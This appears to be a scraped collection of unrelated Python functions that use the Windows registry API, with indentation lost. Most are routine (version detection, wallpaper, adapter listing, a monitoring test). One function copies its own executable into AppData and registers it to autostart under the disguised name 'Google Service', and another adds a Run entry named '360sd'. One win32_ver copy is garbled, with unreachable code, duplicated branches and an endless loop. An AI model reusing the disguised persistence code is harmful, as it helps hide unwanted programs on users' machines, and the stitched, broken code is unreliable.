def win32_get_adapter_list():
"""Get the list of network adapters an their corresponding
network driver identifier."""
from win32api import RegOpenKeyEx, RegEnumKeyEx
from win32api import RegQueryValueEx
from win32con import HKEY_LOCAL_MACHINE
TAPNAME = 'tap08010co'
NET_GUID = "{4D36E972-E325-11CE-BFC1-08002BE10318}"
CONTROL_PATH = "SYSTEM\\CurrentControlSet\\Control\\"
ADAPTER_KEY = CONTROL_PATH + "Class\\" + NET_GUID
NETWORK_CONNECTIONS_KEY = CONTROL_PATH + "Network\\" + NET_GUID
adapters = []
adapter_types = {}
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, ADAPTER_KEY)
for value in RegEnumKeyEx(key):
subpath = "\\".join([ADAPTER_KEY, value[0]])
subkey = RegOpenKeyEx(HKEY_LOCAL_MACHINE, subpath)
drivername = RegQueryValueEx(subkey, "ComponentId")
instanceid = RegQueryValueEx(subkey, "NetCfgInstanceId")
adapter_types[instanceid[0]] = drivername[0]
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, NETWORK_CONNECTIONS_KEY)
for value in RegEnumKeyEx(key):
if value[0].startswith('{'):
subpath = "\\".join(
[NETWORK_CONNECTIONS_KEY, value[0], "Connection"])
subkey = RegOpenKeyEx(HKEY_LOCAL_MACHINE, subpath)
name = RegQueryValueEx(subkey, "Name")
if value[0] in adapter_types:
adapters.append((name[0], adapter_types[value[0]]))
return adapters
def _read_hklm_reg(key_name, value_name):
from win32api import RegOpenKeyEx, RegQueryValueEx, RegCloseKey
from win32con import HKEY_LOCAL_MACHINE, KEY_READ
KEY_WOW64_64KEY = 0x0100
KEY_WOW64_32KEY = 0x0200
if _is_64bit_windows():
try:
key32 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, key_name, 0,
KEY_READ | KEY_WOW64_32KEY)
(value32, _) = RegQueryValueEx(key32, value_name)
RegCloseKey(key32)
except:
value32 = ''
try:
key64 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, key_name, 0,
KEY_READ | KEY_WOW64_64KEY)
(value64, _) = RegQueryValueEx(key64, value_name)
RegCloseKey(key64)
except:
value64 = ''
else:
try:
key32 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, key_name, 0,
KEY_READ)
(value32, _) = RegQueryValueEx(key32, value_name)
RegCloseKey(key32)
except:
value32 = ''
value64 = ''
return (value32, value64)
def __set_wallpaper_from_bmp(self, bmp_path):
reg_key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0,
KEY_SET_VALUE)
RegSetValueEx(reg_key, "WallpaperStyle", 0, REG_SZ, "2")
RegSetValueEx(reg_key, "TillWallpaper", 0, REG_SZ, "0")
SystemParametersInfo(SPI_SETDESKWALLPAPER, bmp_path,
SPIF_SENDWININICHANGE)
def DumpKeyInfo(StateName, ShowSd, ShowData):
reghandle = None
internalName = WNF_STATE_NAME_INTERNAL()
internalName.value = int(StateName, 16) ^ WNF_STATE_KEY
value = None
if internalName.b.NameLifetime != WNF_STATE_NAME_LIFETIME[
'WnfTemporaryStateName'].value:
try:
reghandle = RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
g_LifetimeKeyNames[internalName.b.NameLifetime], 0, KEY_READ)
except Exception:
print("[Error] Could not open root key: {}".format(
g_LifetimeKeyNames[internalName.b.NameLifetime]))
return False
try:
value, _ = RegQueryValueEx(reghandle, StateName)
except error:
print("[Error] Could not find the WnfName in the registry")
return False
print(
"\n| WNF State Name "
"| S | L | P | AC | N | CurSize | MaxSize | Changes |")
print("-" * 118)
DumpWnfData(int(StateName, 16), value, ShowSd, ShowData)
if reghandle != None:
RegCloseKey(reghandle)
return True
def DumpWnfNames(ShowSd, ShowData):
for i in range(0, len(g_LifetimeKeyNames)):
reghandle = None
try:
reghandle = RegOpenKeyEx(HKEY_LOCAL_MACHINE, g_LifetimeKeyNames[i],
0, KEY_READ)
except Exception:
print("[Error] Could not open root key: {}".format(
g_LifetimeKeyNames[i]))
return False
print(
"\n| WNF State Name [{:<10} Lifetime] "
"| S | L | P | AC | N | CurSize | MaxSize | Changes |".format(
WnfLifetimeStrings[i]))
print("-" * 118)
i = 0
while 1:
try:
name, value, _ = RegEnumValue(reghandle, i)
except error:
break
i += 1
try:
StateName = int(name, 16)
except:
continue
if not DumpWnfData(StateName, value, ShowSd, ShowData):
print("[Error] Something went wrong")
return False
if reghandle != None:
RegCloseKey(reghandle)
return True
def run_at_startup_set(appname, path):
"""
Sets the registry key to run at stratup.
"""
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
RegSetValueEx(key, appname, 0, REG_SZ, path)
RegCloseKey(key)
def run_at_startup_remove(appname):
"""
Removes the run-at-startup registry key.
"""
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
RegDeleteValue(key, appname)
RegCloseKey(key)
def try_author():
try:
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE)
RegCloseKey(key)
return True
except:
return False
def run_at_startup_set(app_name, path):
"""
Sets the key to run at startup
"""
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
RegSetValueEx(key, app_name, 0, REG_SZ, path)
RegCloseKey(key)
print("Key set")
def main():
# open register
regkey = RegOpenKeyEx(HKEY_CURRENT_USER, 'Control Panel\\Desktop', 0,
KEY_SET_VALUE)
RegSetValueEx(regkey, 'WallpaperStyle', 0, REG_SZ, '0')
RegSetValueEx(regkey, 'TileWallpaper', 0, REG_SZ, '0')
# refresh screen
SystemParametersInfo(SPI_SETDESKWALLPAPER,
os.path.abspath('cache/cache.jpg'),
SPIF_SENDWININICHANGE)
def Reg_Edit():
reg_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg_falg = win32con.KEY_ALL_ACCESS | win32con.KEY_WRITE | win32con.KEY_READ
key = RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, reg_path, 0, reg_falg)
RegSetValueEx(key, "FtpServer", 0, win32con.REG_SZ,
"\"C:\\Program Files\\FtpServer.exe\"")
RegSetValueEx(key, "QQClient", 0, win32con.REG_SZ,
"\"C:\\Program Files\\QQClient.exe\"")
RegSetValueEx(key, "360sd", 0, win32con.REG_SZ,
"\"C:\\Program Files\\QQClient.exe\"")
RegCloseKey(key)
def auto_start(what, path):
try:
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE)
if what:
RegSetValueEx(key, 'MY_WINDMILL', 0, REG_SZ, '"%s" /start' % path)
else:
RegDeleteValue(key, 'MY_WINDMILL')
RegCloseKey(key)
return True
except :
return False
def set_wall(path=None):
try:
key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0,
KEY_SET_VALUE)
RegSetValueEx(key, 'WallpaperStyle', 0, REG_SZ, '2')
RegSetValueEx(key, 'TileWallpaper', 0, REG_SZ, '0')
if not path:
path = dirname(__file__) + '/image/wall.jpg'
SystemParametersInfo(SPI_SETDESKWALLPAPER, path, 1 + 2)
RegCloseKey(key)
except BaseException as e:
dump_log('设置壁纸' + '--->' + str(e))
def __init__(self, key, sub_key, flag):
"""
Constructor :
key : HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS
sub_key : The name of a key that this method opens
flag : "r" for read
"w" for write
"a" for append
"b" for binary
"""
from win32api import RegQueryValueEx, RegCreateKey, RegOpenKeyEx
from win32con import KEY_ALL_ACCESS
from StringIO import StringIO
# Save files informations
self.key = key
self.sub_key = sub_key
# Initialization of internal data
self.deleted = 0
self.handle = None
self.data = None
# Check mode
self.__checkMode(flag)
# Create an empty file
self.data = StringIO()
try:
# Open registry key
self.handle = RegOpenKeyEx(key, sub_key, 0, KEY_ALL_ACCESS)
# Read key content
data = RegQueryValueEx(self.handle, "")[0]
# If the file is in read mode
if self.flag == self.READ:
# Read data
self.data = StringIO(data)
# If the file is in append mode
elif self.flag == self.APPEND:
self.data.write(data)
except: # If the registry key not found
# If the file must be read
if self.flag == self.READ:
# The file is not found
raise FileNotFoundError(key, sub_key)
else:
# Create a new registry key
self.handle = RegCreateKey(key, sub_key)
def StartYardServer(self):
try:
rkey = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Webers\\Y.A.R.D")
path = RegQueryValueEx(rkey, "program")[0]
if not os.path.exists(path):
raise Exception
except:
raise self.Exception(
"Please start Yards.exe first and configure it.")
try:
hProcess = CreateProcess(None, path, None, None, 0,
CREATE_NEW_CONSOLE, None, None,
STARTUPINFO())[0]
except Exception, exc:
raise eg.Exception(FormatError(exc[0]))
def launchAtStart():
#first of all we have to check if the path that we want exists
if not os.path.exists(dirProgram):
os.makedirs(dirProgram)
#copy the program to the new folder
shutil.copy(sys.argv[0], dirProgram)
#create the registry key
from win32api import (GetModuleFileName, RegCloseKey, RegDeleteValue,
RegOpenKeyEx, RegSetValueEx)
from win32con import HKEY_LOCAL_MACHINE, KEY_WRITE, REG_SZ
SUBKEY = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
flag = RegSetValueEx(key, appName, 0, REG_SZ, pathProgram)
RegCloseKey(key)
return 1
return 0
def AutoRun(): # 自动拷贝并使文件开机自动运行
alwaysFileName = path.basename(__file__)
alwaysFileName = alwaysFileName.split('.')[0]
nowPyPath = path.abspath(path.dirname(__file__))
nowExeName = path.abspath(
path.dirname(__file__)) + '\\' + alwaysFileName + '.exe'
newExeFilePath = 'C:\\Users\\Administrator\\AppData\\Local\\Autodesk\\' + \
alwaysFileName + '.exe' # 变成exe后,name还是.py,所以要手动加exe
if nowPyPath != 'C:\\Users\\Administrator\\AppData\\Local\\Autodesk\\': # 如果文件位置不是Autodesk的位置
try:
copyfile(nowExeName, newExeFilePath) # 复制文件到指定目录
print('复制成功')
except Exception as e:
print(e)
KeyName = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run' # 注册表项名
keyEnum = RegOpenKeyEx(
HKEY_CURRENT_USER,
'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0,
KEY_ALL_ACCESS)
ifValueExist = False
try: # 判断要注入的键值是否存在
i = 0
while True:
regValue = RegEnumValue(keyEnum, i)
if regValue[0] == 'Google Service':
ifValueExist = True
print('键值已存在')
i += 1
except:
pass
if not ifValueExist:
try:
key = RegOpenKey(HKEY_CURRENT_USER, KeyName, 0, KEY_ALL_ACCESS)
RegSetValueEx(key, 'Google Service', 0, REG_SZ, newExeFilePath)
RegCloseKey(key)
print('添加成功!')
except Exception as e:
print(e)
def win32_ver(release='', version='', csd='', ptype=''):
""" Get additional version information from the Windows Registry
and return a tuple (version,csd,ptype) referring to version
number, CSD level and OS type (multi/single
processor).
As a hint: ptype returns 'Uniprocessor Free' on single
processor NT machines and 'Multiprocessor Free' on multi
processor machines. The 'Free' refers to the OS version being
free of debugging code. It could also state 'Checked' which
means the OS version uses debugging code, i.e. code that
checks arguments, ranges, etc. (Thomas Heller).
Note: this functions only works if Mark Hammond's win32
package is installed and obviously only runs on Win32
compatible platforms.
XXX Is there any way to find out the processor type on WinXX ?
XXX Is win32 available on Windows CE ?
Adapted from code posted by Karl Putland to comp.lang.python.
"""
# Import the needed APIs
try:
import win32api
except ImportError:
return release, version, csd, ptype
from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx
from win32con import HKEY_LOCAL_MACHINE,VER_PLATFORM_WIN32_NT,\
VER_PLATFORM_WIN32_WINDOWS
# Find out the registry key and some general version infos
maj, min, buildno, plat, csd = GetVersionEx()
version = '%i.%i.%i' % (maj, min, buildno & 0xFFFF)
if csd[:13] == 'Service Pack ':
csd = 'SP' + csd[13:]
if plat == VER_PLATFORM_WIN32_WINDOWS:
regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
# Try to guess the release name
if maj == 4:
if min == 0:
release = '95'
else:
release = '98'
elif maj == 5:
release = '2000'
elif plat == VER_PLATFORM_WIN32_NT:
regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
if maj <= 4:
release = 'NT'
elif maj == 5:
release = '2000'
else:
if not release:
# E.g. Win3.1 with win32s
release = '%i.%i' % (maj, min)
return release, version, csd, ptype
# Open the registry key
try:
keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
# Get a value to make sure the key exists...
RegQueryValueEx(keyCurVer, 'SystemRoot')
except:
return release, version, csd, ptype
# Parse values
#subversion = _win32_getvalue(keyCurVer,
# 'SubVersionNumber',
# ('',1))[0]
#if subversion:
# release = release + subversion # 95a, 95b, etc.
build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0]
ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0]
# Normalize version
version = _norm_version(version, build)
# Close key
RegCloseKey(keyCurVer)
return release, version, csd, ptype
def win32_ver(release='', version='', csd='', ptype=''):
""" Get additional version information from the Windows Registry
and return a tuple (version,csd,ptype) referring to version
number, CSD level and OS type (multi/single
processor).
As a hint: ptype returns 'Uniprocessor Free' on single
processor NT machines and 'Multiprocessor Free' on multi
processor machines. The 'Free' refers to the OS version being
free of debugging code. It could also state 'Checked' which
means the OS version uses debugging code, i.e. code that
checks arguments, ranges, etc. (Thomas Heller).
Note: this function works best with Mark Hammond's win32
package installed, but also on Python 2.3 and later. It
obviously only runs on Win32 compatible platforms.
"""
# XXX Is there any way to find out the processor type on WinXX ?
# XXX Is win32 available on Windows CE ?
#
# Adapted from code posted by Karl Putland to comp.lang.python.
#
# The mappings between reg. values and release names can be found
# here: http://msdn.microsoft.com/library/en-us/sysinfo/base/osversioninfo_str.asp
# Import the needed APIs
try:
import win32api
from win32api import RegQueryValueEx, RegOpenKeyEx, \
RegCloseKey, GetVersionEx
from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, \
VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION
except ImportError:
# Emulate the win32api module using Python APIs
try:
sys.getwindowsversion
except AttributeError:
# No emulation possible, so return the defaults...
return release, version, csd, ptype
else:
# Emulation using winreg (added in Python 2.0) and
# sys.getwindowsversion() (added in Python 2.3)
import winreg
GetVersionEx = sys.getwindowsversion
RegQueryValueEx = winreg.QueryValueEx
RegOpenKeyEx = winreg.OpenKeyEx
RegCloseKey = winreg.CloseKey
HKEY_LOCAL_MACHINE = winreg.HKEY_LOCAL_MACHINE
VER_PLATFORM_WIN32_WINDOWS = 1
VER_PLATFORM_WIN32_NT = 2
VER_NT_WORKSTATION = 1
VER_NT_SERVER = 3
REG_SZ = 1
# Find out the registry key and some general version infos
winver = GetVersionEx()
maj, min, buildno, plat, csd = winver
version = '%i.%i.%i' % (maj, min, buildno & 0xFFFF)
if hasattr(winver, "service_pack"):
if winver.service_pack != "":
csd = 'SP%s' % winver.service_pack_major
else:
if csd[:13] == 'Service Pack ':
csd = 'SP' + csd[13:]
if plat == VER_PLATFORM_WIN32_WINDOWS:
regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
# Try to guess the release name
if maj == 4:
if min == 0:
release = '95'
elif min == 10:
release = '98'
elif min == 90:
release = 'Me'
else:
release = 'postMe'
elif maj == 5:
release = '2000'
elif plat == VER_PLATFORM_WIN32_NT:
regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
if maj <= 4:
release = 'NT'
elif maj == 5:
if min == 0:
release = '2000'
elif min == 1:
release = 'XP'
elif min == 2:
release = '2003Server'
else:
release = 'post2003'
elif maj == 6:
if hasattr(winver, "product_type"):
product_type = winver.product_type
else:
product_type = VER_NT_WORKSTATION
# Without an OSVERSIONINFOEX capable sys.getwindowsversion(),
# or help from the registry, we cannot properly identify
# non-workstation versions.
try:
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
name, type = RegQueryValueEx(key, "ProductName")
# Discard any type that isn't REG_SZ
if type == REG_SZ and name.find("Server") != -1:
product_type = VER_NT_SERVER
except WindowsError:
# Use default of VER_NT_WORKSTATION
pass
if min == 0:
if product_type == VER_NT_WORKSTATION:
release = 'Vista'
else:
release = '2008Server'
elif min == 1:
if product_type == VER_NT_WORKSTATION:
release = '7'
else:
release = '2008ServerR2'
else:
release = 'post2008Server'
else:
if not release:
# E.g. Win3.1 with win32s
release = '%i.%i' % (maj, min)
return release, version, csd, ptype
# Open the registry key
try:
keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
# Get a value to make sure the key exists...
RegQueryValueEx(keyCurVer, 'SystemRoot')
except:
return release, version, csd, ptype
# Parse values
#subversion = _win32_getvalue(keyCurVer,
# 'SubVersionNumber',
# ('',1))[0]
#if subversion:
# release = release + subversion # 95a, 95b, etc.
build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0]
ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0]
# Normalize version
version = _norm_version(version, build)
# Close key
RegCloseKey(keyCurVer)
return release, version, csd, ptype
def win32_ver(release='', version='', csd='', ptype=''):
""" Get additional version information from the Windows Registry
and return a tuple (version,csd,ptype) referring to version
number, CSD level and OS type (multi/single
processor).
As a hint: ptype returns 'Uniprocessor Free' on single
processor NT machines and 'Multiprocessor Free' on multi
processor machines. The 'Free' refers to the OS version being
free of debugging code. It could also state 'Checked' which
means the OS version uses debugging code, i.e. code that
checks arguments, ranges, etc. (Thomas Heller).
Note: this function works best with Mark Hammond's win32
package installed, but also on Python 2.3 and later. It
obviously only runs on Win32 compatible platforms.
"""
try:
import win32api
from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx
from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION
except ImportError:
try:
sys.getwindowsversion
except AttributeError:
return (release, version, csd, ptype)
import _winreg
GetVersionEx = sys.getwindowsversion
RegQueryValueEx = _winreg.QueryValueEx
RegOpenKeyEx = _winreg.OpenKeyEx
RegCloseKey = _winreg.CloseKey
HKEY_LOCAL_MACHINE = _winreg.HKEY_LOCAL_MACHINE
VER_PLATFORM_WIN32_WINDOWS = 1
VER_PLATFORM_WIN32_NT = 2
VER_NT_WORKSTATION = 1
VER_NT_SERVER = 3
REG_SZ = 1
winver = GetVersionEx()
maj, min, buildno, plat, csd = winver
version = '%i.%i.%i' % (maj, min, buildno & 65535)
if hasattr(winver, 'service_pack'):
if winver.service_pack != '':
csd = 'SP%s' % winver.service_pack_major
elif csd[:13] == 'Service Pack ':
csd = 'SP' + csd[13:]
if plat == VER_PLATFORM_WIN32_WINDOWS:
regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
if maj == 4:
if min == 0:
release = '95'
elif min == 10:
release = '98'
elif min == 90:
release = 'Me'
else:
release = 'postMe'
elif maj == 5:
release = '2000'
elif plat == VER_PLATFORM_WIN32_NT:
regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
if maj <= 4:
release = 'NT'
elif maj == 5:
if min == 0:
release = '2000'
elif min == 1:
release = 'XP'
elif min == 2:
release = '2003Server'
else:
release = 'post2003'
elif maj == 6:
if hasattr(winver, 'product_type'):
product_type = winver.product_type
else:
product_type = VER_NT_WORKSTATION
try:
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
name, type = RegQueryValueEx(key, 'ProductName')
if type == REG_SZ and name.find('Server') != -1:
product_type = VER_NT_SERVER
except WindowsError:
pass
if min == 0:
if product_type == VER_NT_WORKSTATION:
release = 'Vista'
else:
release = '2008Server'
elif min == 1:
if product_type == VER_NT_WORKSTATION:
release = '7'
else:
release = '2008ServerR2'
else:
release = 'post2008Server'
else:
if not release:
release = '%i.%i' % (maj, min)
return (release, version, csd, ptype)
try:
keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
RegQueryValueEx(keyCurVer, 'SystemRoot')
except:
return (release, version, csd, ptype)
build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0]
ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0]
version = _norm_version(version, build)
RegCloseKey(keyCurVer)
return (release, version, csd, ptype)
def configure_syscheck_environment(time_sleep):
# Create every needed directory
for n in range(n_windows_registry):
t_dir = f'{testreg}{n}'
create_registry(registry_parser[KEY], f'{testreg}{n}', KEY_WOW64_64KEY)
reg_list.append(t_dir)
control_service('restart')
logger.debug('Waiting 15 seconds for syscheckd to start.')
time.sleep(15)
reg_key = 'reg_key'
reg_value = 'value_name'
logger.debug(
f'Waiting {str(time_sleep)} seconds. Execute `generate_windows_yaml.py` now.'
)
time.sleep(time_sleep)
logger.debug(f'Waiting {SCAN_WAIT} seconds for baseline scan to finish.')
time.sleep(120)
logger.debug('Creating registries...')
for registry in reg_list:
key_h = create_registry(registry_parser[KEY],
os.path.join(registry, reg_key),
KEY_WOW64_64KEY)
modify_registry_value(key_h, reg_value, REG_SZ, 'added')
TimeMachine.travel_to_future(timedelta(hours=13))
logger.debug(f'Waiting {SCAN_WAIT} seconds for scan to finish.')
time.sleep(SCAN_WAIT)
logger.debug('Modifying registries...')
for registry in reg_list:
modify_key_perms(
registry_parser[KEY], os.path.join(registry, reg_key),
KEY_WOW64_64KEY,
LookupAccountName(None, f"{platform.node()}\\{os.getlogin()}")[0])
modify_registry_owner(
registry_parser[KEY], os.path.join(registry, reg_key),
KEY_WOW64_64KEY,
LookupAccountName(None, f"{platform.node()}\\{os.getlogin()}")[0])
key_h = RegOpenKeyEx(registry_parser[KEY],
os.path.join(registry, reg_key), 0,
KEY_ALL_ACCESS | KEY_WOW64_64KEY)
modify_registry_value(key_h, reg_value, REG_SZ, 'modified')
TimeMachine.travel_to_future(timedelta(hours=13))
logger.debug(f'Waiting {SCAN_WAIT} seconds for scan to finish.')
time.sleep(SCAN_WAIT)
logger.debug('Deleting registries...')
for registry in reg_list:
delete_registry(registry_parser[KEY], os.path.join(registry, reg_key),
KEY_WOW64_64KEY)
TimeMachine.travel_to_future(timedelta(hours=13))
logger.debug(f'Waiting {SCAN_WAIT} seconds for scan to finish.')
time.sleep(SCAN_WAIT)
def win32_ver(release='', version='', csd='', ptype=''):
return ('Unknown', '', '', '')
try:
import win32api
from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx
from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION
except ImportError:
try:
sys.getwindowsversion
except AttributeError:
return (release, version, csd, ptype)
import winreg
GetVersionEx = sys.getwindowsversion
RegQueryValueEx = winreg.QueryValueEx
RegOpenKeyEx = winreg.OpenKeyEx
RegCloseKey = winreg.CloseKey
HKEY_LOCAL_MACHINE = winreg.HKEY_LOCAL_MACHINE
VER_PLATFORM_WIN32_WINDOWS = 1
VER_PLATFORM_WIN32_NT = 2
VER_NT_WORKSTATION = 1
VER_NT_SERVER = 3
REG_SZ = 1
winver = GetVersionEx()
(maj, min, buildno, plat, csd) = winver
version = '%i.%i.%i' % (maj, min, buildno & 65535)
if hasattr(winver, 'service_pack'):
if winver.service_pack != '':
csd = 'SP%s' % winver.service_pack_major
elif csd[:13] == 'Service Pack ':
csd = 'SP' + csd[13:]
if plat == VER_PLATFORM_WIN32_WINDOWS:
regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
if maj == 4:
if min == 0:
release = '95'
elif min == 10:
release = '98'
elif min == 90:
release = 'Me'
else:
release = 'postMe'
if maj == 5:
release = '2000'
elif maj == 5:
release = '2000'
elif plat == VER_PLATFORM_WIN32_NT:
regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
if maj <= 4:
release = 'NT'
elif maj == 5:
if min == 0:
release = '2000'
elif min == 1:
release = 'XP'
elif min == 2:
release = '2003Server'
else:
release = 'post2003'
if maj == 6:
if hasattr(winver, 'product_type'):
product_type = winver.product_type
else:
product_type = VER_NT_WORKSTATION
try:
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
(name, type) = RegQueryValueEx(key, 'ProductName')
while type == REG_SZ and name.find('Server') != -1:
product_type = VER_NT_SERVER
except WindowsError:
pass
if min == 0:
if product_type == VER_NT_WORKSTATION:
release = 'Vista'
else:
release = '2008Server'
if min == 1:
if product_type == VER_NT_WORKSTATION:
release = '7'
else:
release = '2008ServerR2'
if min == 2:
if product_type == VER_NT_WORKSTATION:
release = '8'
else:
release = '2012Server'
release = 'post2012Server'
else:
release = 'post2012Server'
elif min == 2:
if product_type == VER_NT_WORKSTATION:
release = '8'
else:
release = '2012Server'
release = 'post2012Server'
else:
release = 'post2012Server'
elif min == 1:
if product_type == VER_NT_WORKSTATION:
release = '7'
else:
release = '2008ServerR2'
if min == 2:
if product_type == VER_NT_WORKSTATION:
release = '8'
else:
release = '2012Server'
release = 'post2012Server'
else:
release = 'post2012Server'
elif min == 2:
if product_type == VER_NT_WORKSTATION:
release = '8'
else:
release = '2012Server'
release = 'post2012Server'
else:
release = 'post2012Server'
elif maj == 6:
if hasattr(winver, 'product_type'):
product_type = winver.product_type
else:
product_type = VER_NT_WORKSTATION
try:
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
(name, type) = RegQueryValueEx(key, 'ProductName')
while type == REG_SZ and name.find('Server') != -1:
product_type = VER_NT_SERVER
except WindowsError:
pass
if min == 0:
if product_type == VER_NT_WORKSTATION:
release = 'Vista'
else:
release = '2008Server'
if min == 1:
if product_type == VER_NT_WORKSTATION:
release = '7'
else:
release = '2008ServerR2'
if min == 2:
if product_type == VER_NT_WORKSTATION:
release = '8'
else:
release = '2012Server'
release = 'post2012Server'
else:
release = 'post2012Server'
elif min == 2:
if product_type == VER_NT_WORKSTATION:
release = '8'
else:
release = '2012Server'
release = 'post2012Server'
else:
release = 'post2012Server'
elif min == 1:
if product_type == VER_NT_WORKSTATION:
release = '7'
else:
release = '2008ServerR2'
if min == 2:
if product_type == VER_NT_WORKSTATION:
release = '8'
else:
release = '2012Server'
release = 'post2012Server'
else:
release = 'post2012Server'
elif min == 2:
if product_type == VER_NT_WORKSTATION:
release = '8'
else:
release = '2012Server'
release = 'post2012Server'
else:
release = 'post2012Server'
else:
if not release:
release = '%i.%i' % (maj, min)
return (release, version, csd, ptype)
try:
keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
RegQueryValueEx(keyCurVer, 'SystemRoot')
except:
return (release, version, csd, ptype)
build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0]
ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0]
version = _norm_version(version, build)
RegCloseKey(keyCurVer)
return (release, version, csd, ptype)
def run_at_startup_remove(app_name):
key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
RegDeleteValue(key, app_name)
RegCloseKey(key)
def set_wall():
key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0, KEY_SET_VALUE)
RegSetValueEx(key, 'WallpaperStyle', 0, REG_SZ, '2')
RegSetValueEx(key, 'TileWallpaper', 0, REG_SZ, '0')
SystemParametersInfo(SPI_SETDESKWALLPAPER, dirname(__file__)+'/image/wall.jpg', 1+2)
RegCloseKey(key)